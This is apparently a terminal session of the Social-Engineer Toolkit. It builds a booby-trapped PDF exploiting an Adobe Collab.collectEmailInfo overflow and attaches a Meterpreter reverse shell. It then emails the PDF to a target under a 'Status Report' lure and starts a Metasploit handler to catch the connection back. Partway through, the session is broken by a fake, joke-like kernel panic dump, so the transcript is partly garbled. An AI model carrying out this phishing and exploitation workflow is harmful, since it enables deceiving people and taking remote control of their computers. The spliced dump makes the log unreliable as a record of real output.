root@root:~# cd /pentest/exploits/set/
root@root:/pentest/exploits/set# ./set

  :::=== :::===== :::====
  :::    :::      :::====
   ===== ======      ===
     === ===         ===
  ====== ========    ===

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]        Development Team: Thomas Werth            [---]
[---]        Development Team: JR DePre (pr1me)        [---]
[---]        Development Team: Joey Furr (j0fer)       [---]
[---]                 Version: 2.0.3                   [---]
[---]          Codename: 'Trebuchet Edition'           [---]
[---]        Report bugs to: [email protected]          [---]
[---]        Follow me on Twitter: dave_rel1k          [---]
[---]       Homepage: http://www.secmaniac.com         [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

Join us on irc.freenode.net in channel #setoolkit

Select from the menu:

  1) Spear-Phishing Attack Vectors
  2) Website Attack Vectors
  3) Infectious Media Generator
  4) Create a Payload and Listener
  5) Mass Mailer Attack
  6) Arduino-Based Attack Vector
  7) SMS Spoofing Attack Vector
  8) Wireless Access Point Attack Vector
  9) Third Party Modules
  10) Update the Metasploit Framework
  11) Update the Social-Engineer Toolkit
  12) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit

set > 1

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is
installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

  1) Perform a Mass Email Attack
  2) Create a FileFormat Payload
  3) Create a Social-Engineering Template
  99) Return to Main Menu

set:phishing > 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

  1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
  2) SET Custom Written Document UNC LM SMB Capture Attack
  3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
  4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
  5) Adobe Flash Player "Button" Remote Code Execution
  6) Adobe CoolType SING Table "uniqueName" Overflow
  7) Adobe Flash Player "newfunction" Invalid Pointer Use
  8) Adobe Collab.collectEmailInfo Buffer Overflow
  9) Adobe Collab.getIcon Buffer Overflow
  10) Adobe JBIG2Decode Memory Corruption Exploit
  11) Adobe PDF Embedded EXE Social Engineering
  12) Adobe util.printf() Buffer Overflow
  13) Custom EXE to VBA (sent via RAR) (RAR required)
  14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  15) Adobe PDF Embedded EXE Social Engineering (NOJS)
  16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

set:payloads > 8

  1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
  2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
  3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
  4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
  5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
  6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
  7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads > 2
set:payloads > Port to connect back on [443]:
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/src/program_junk/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

  1. Keep the filename, I don't care.
  2. Rename the file, I want to be cool.

set:phishing > 1
[*] Keeping the filename and moving on.

  Social Engineer Toolkit Mass E-Mailer

  There are two options on the mass e-mailer, the first would
  be to send an email to one individual person. The second option
  will allow you to import a list and send it to as many people as
  you want within that list.

  What do you want to do:

  1. E-Mail Attack Single Email Address
  2. E-Mail Attack Mass Mailer
  99. Return to main menu.

set:phishing > 1

Do you want to use a predefined template or craft a one time email template.

  1. Pre-Defined Template
  2. One-Time Use Email Template

set:phishing > 1
[-] Available templates:
1: WOAAAA!!!!!!!!!! This is crazy...
2: How long has it been?
3: Have you seen this?
4: Baby Pics
5: Dan Brown's Angels & Demons
6: New Update
7: Computer Issue
8: Status Report
9: Strange internet usage from your computer
set:phishing > 8
set:phishing > Send email to: [email protected]

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing > 1
set:phishing > Your gmail email address: : [email protected]
Email password:
set:phishing >
set:phishing > Flag this message/s as high priority? [yes|no]: no
[*] SET has finished delivering the emails
set:phishing > Setup a listener [yes|no]: Unhandled exception in thread started by
yes
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing

       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 652 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 652 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.11
LHOST => 192.168.1.11
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
Version BT5R1; try a different version.